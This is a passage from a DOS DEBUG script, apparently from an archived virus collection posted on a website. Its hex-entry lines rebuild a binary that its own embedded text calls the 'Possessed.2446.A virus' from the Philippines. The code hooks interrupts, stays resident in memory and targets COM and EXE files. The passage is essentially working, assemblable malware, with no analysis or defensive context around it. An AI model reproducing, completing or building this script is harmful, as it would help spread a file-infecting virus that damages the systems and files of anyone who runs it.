E 0640 06 58 00 75 07 2E FE 0E 5A 00 74 06 9D 2E FF 2E
E 0650 4E 00 9D B8 06 00 CD 10 0E 1F 33 DB 33 D2 BE 63
E 0660 05 C7 06 6C 01 C8 00 C7 06 6E 01 00 00 E8 3E 00
E 0670 C7 06 6C 01 C9 00 C7 06 6E 01 01 00 E8 2F 00 C7
E 0680 06 6C 01 BD 00 C7 06 6E 01 FF FF E8 20 00 C7 06
E 0690 6C 01 C9 00 C7 06 6E 01 FF FF E8 11 00 C7 06 6C
E 06A0 01 BD 00 C7 06 6E 01 01 00 E8 02 00 EB B0 56 B0
E 06B0 01 B9 02 00 51 56 8A 1C 0A DB 74 16 8B CB 03 0E
E 06C0 6C 01 8A 54 01 03 16 6E 01 B4 0C CD 10 83 C6 02
E 06D0 EB E4 5E 32 C0 59 E2 DC 5E C3 C7 44 12 70 19 8B
E 06E0 44 0E 05 10 00 2E A3 60 00 8B 44 10 2E A3 62 00
E 06F0 8B 44 14 2E A3 66 00 8B 44 16 05 10 00 2E A3 64
E 0700 00 8B 44 04 83 7C 02 00 74 01 48 BB 00 02 F7 E3
E 0710 03 44 02 83 D2 00 05 0F 00 83 D2 00 25 F0 FF 2E
E 0720 A3 68 00 2E 89 16 6A 00 05 8E 09 83 D2 00 72 5E
E 0730 F7 F3 0B D2 74 01 40 89 44 04 89 54 02 2E A1 68
E 0740 00 2E 8B 16 6A 00 BB 10 00 F7 F3 2B 44 08 2D 10
E 0750 00 89 44 16 C7 44 14 18 08 89 44 0E C7 44 10 8E
E 0760 0A 2E 8B 1E 10 0A E8 56 00 B9 1C 00 33 D2 B4 40
E 0770 E8 31 00 0E 1F 8B 16 68 00 8B 0E 6A 00 B8 00 42
E 0780 E8 21 00 BA 00 00 B9 8E 09 B4 40 E8 16 00 E9 53
E 0790 FD 33 C0 8E C0 2E 8E 16 08 0A 2E 8B 26 06 0A 58
E 07A0 07 5D F9 C3 55 06 50 33 C0 8E C0 2E 89 26 06 0A
E 07B0 2E 8C 16 08 0A 58 07 9C 2E FF 1E 4A 00 5D C3 33
E 07C0 C9 8B D1 B8 00 42 E8 DB FF C3 51 56 28 04 46 E2
E 07D0 FB 5E 59 C3 56 51 FC F3 A6 74 01 F9 59 5E C3 5A
E 07E0 66 64 64 58 65 5B 45 5A 66 64 32 75 74 78 78 6A
E 07F0 78 78 6A 69 46 45 67 9C 86 46 45 8D 86 46 45 8D
E 0800 86 46 45 8D 86 46 45 8D 86 46 49 2D 45 2F 32 66
E 0810 9A 99 8D 94 97 5F 45 6F 94 93 6F 94 93 45 6C 9A
E 0820 92 87 86 45 94 8B 45 66 89 7A 2F 3F 41 4B 42 4B
E 0830 42 4C 43 4C 44 4C 45 4C 43 4D 46 4D 47 4D 44 4E
E 0840 48 4E 49 4E 4A 4E 45 4F 4B 4F 4C 4F B6 4A B5 4A
E 0850 B5 4B B4 4B B3 4B B2 4B B4 4C B1 4C B0 4C B3 4D
E 0860 AF 4D AE 4D AD 4D B2 4E AC 4E AB 4E 4C 54 4C 55
E 0870 4D 55 4E 55 4F 56 50 56 51 56 52 56 53 56 54 57
E 0880 55 57 56 57 57 57 58 57 59 58 5A 58 5B 58 5C 58
E 0890 5D 58 5A 59 5B 59 5C 59 5D 59 60 59 5F 59 60 59
E 08A0 61 59 62 59 5B 5A 5C 5A 63 5A 64 5A 65 5A 66 5A
E 08B0 67 5A 5C 5B 68 5B 69 5B 6A 5B 6B 5B 6C 5B 6D 5C
E 08C0 6E 5C 6F 5C 70 5D B1 53 B0 54 AF 54 AE 54 AD 55
E 08D0 AC 55 AB 55 AA 55 A9 55 A8 55 A7 56 A6 56 A5 56
E 08E0 A4 56 A3 56 A2 57 A1 57 A0 57 9F 57 9E 57 9D 57
E 08F0 9C 58 9B 58 9A 58 99 58 98 58 9A 59 99 59 98 59
E 0900 97 59 96 59 95 59 94 59 93 59 92 59 99 5A 98 5A
E 0910 91 5A 90 5A 8F 5A 8E 5A 8D 5A 98 5B 8C 5B 8B 5B
E 0920 8A 5B 89 5B 88 5B 87 5B 86 5C 85 5C 84 5C 83 5C
E 0930 76 63 75 64 75 65 74 66 74 67 73 68 73 69 72 6A
E 0940 71 6B 71 6C 70 6D 70 6E 6F 6F 6E 70 6E 71 7B 71
E 0950 6D 72 7A 72 79 72 6D 73 78 73 77 73 76 73 75 73
E 0960 6C 74 71 74 72 74 73 74 74 74 6C 75 6D 75 6E 75
E 0970 6F 75 70 75 6B 76 6C 76 6D 81 6E 81 6F 81 70 80
E 0980 71 80 72 80 73 80 74 7F 75 7F 76 7F 77 7F 78 7E
E 0990 79 7E 7A 7E 7B 7E 7C 7D 7D 7D 7E 7D 7F 7D 80 7D
E 09A0 81 7C 82 7C 83 7C 84 7C 85 7B 86 7B 87 7B 88 7B
E 09B0 89 7A 8A 7A 8B 7A 8C 7A 8D 79 8E 79 8F 79 90 79
E 09C0 91 78 92 78 93 78 94 77 95 77 96 76 97 76 98 75
E 09D0 00 43 3A 2A 2E 43 4F 4D 00 43 3A 2A 2E 45 58 45
E 09E0 00 BA CD AB B4 30 CD 21 81 F2 BA DC 74 06 BE 00
E 09F0 01 E9 DD 01 8C C0 2E 03 06 60 01 8E D0 2E 8B 26
E 0A00 62 01 8C C0 2E 03 06 64 01 2E A3 4C 01 2E A1 66
E 0A10 01 2E A3 4A 01 F8 2E FF 2E 4A 01 FC F3 A4 8C C0
E 0A20 05 10 00 50 B8 60 07 50 CB 8B C4 2D 00 01 8B E0
E 0A30 8C C8 8E D8 8E D0 1E 2D 10 00 8E C0 8C 06 6E 00
E 0A40 50 26 A1 2C 00 A3 6C 00 58 1E 06 8E D8 0E 07 BE
E 0A50 0A 00 BF 8E 09 B9 06 00 FC F3 A5 BB 12 08 89 1E
E 0A60 0A 00 8C 0E 0C 00 07 1F 07 BE 21 05 B9 42 00 51
E 0A70 B0 25 E8 55 FD BF 03 00 56 FC F3 A4 5E 59 F6 D8
E 0A80 E8 47 FD A1 18 07 2D 99 98 CD 21 89 1E 4A 00 8C
E 0A90 06 4C 00 BA 45 00 80 EC 10 E8 08 FD C7 06 58 00
E 0AA0 00 00 8A 16 5B 00 88 16 5A 00 05 E7 0F E8 F4 FC
E 0AB0 89 1E 4E 00 8C 06 50 00 BA 74 03 80 EC 10 E8 E3
E 0AC0 FC 0E 1F 8E 06 6E 00 B4 49 E8 D8 FC BA 8E 09 B1
E 0AD0 04 D3 EA 83 C2 20 B4 31 E8 C9 FC 0E 0E 1F 8E 06
E 0AE0 6E 00 BE 8E 09 BF 0A 00 B9 06 00 FC F3 A5 07 80
E 0AF0 3E 49 00 01 75 08 C6 06 49 00 00 E9 97 00 A1 6E
E 0B00 00 BE 9D 09 89 44 04 C7 44 02 80 00 89 44 08 C7
E 0B10 44 06 5C 00 89 44 0C C7 44 0A 6C 00 A1 6C 00 89
E 0B20 04 B4 30 CD 21 A2 48 00 3C 03 72 1F 8E 1E 6C 00
E 0B30 33 F6 B9 C8 00 80 3C 01 75 0E 80 7C 03 3A 75 08
E 0B40 8B D6 83 C2 02 EB 15 90 46 E2 EA 0E 1F BE D4 08
E 0B50 BF 90 09 B9 0D 00 FC F3 A4 BA 90 09 FA 2E 8C 16
E 0B60 5C 00 2E 89 26 5E 00 FB B8 00 4B BB 9D 09 2E 80
E 0B70 3E 48 00 03 72 06 E8 2B FC EB 03 90 CD 21 FA 2E
E 0B80 8E 16 5C 00 2E 8B 26 5E 00 FB 0E 1F 73 07 BA 03
E 0B90 00 B4 09 CD 21 B4 4D CD 21 B4 4C CD 21 50 4F 53
E 0BA0 32 34 34 36 41 2E 43 4F 4D 00 81 C6 00 01 BA CD
E 0BB0 AB B4 30 CD 21 81 F2 BA DC 75 12 83 EE 5A BF 00
E 0BC0 01 B9 2D 00 FC F3 A5 BB 00 01 F8 FF E3 81 EE 8E
E 0BD0 09 0E 1F BF 00 01 B9 08 09 D1 E9 FC F3 A5 B9 86
E 0BE0 00 8C 06 4C 01 C7 06 4A 01 52 08 2E FF 2E 4A 01
E 0BF0 56 65 72 73 69 6F 6E 20 31 2E 30 38 20 E9 B9 01
E 0C00 0D 20 20 20 0D 0A 4D 61 62 75 68 61 79 21 0D 0A
E 0C10 0A 54 68 69 73 20 69 73 20 50 6F 73 73 65 73 73
E 0C20 65 64 2E 32 34 34 36 2E 41 20 76 69 72 75 73 20
E 0C30 63 6F 6D 69 6E 67 20 74 6F 20 79 6F 75 20 66 72
E 0C40 6F 6D 20 74 68 65 20 50 68 69 6C 69 70 70 69 6E
E 0C50 65 73 2E 0D 0A 42 72

RCX
0B57
W
Q

ÄÄ POS2446A.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


EoF.

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT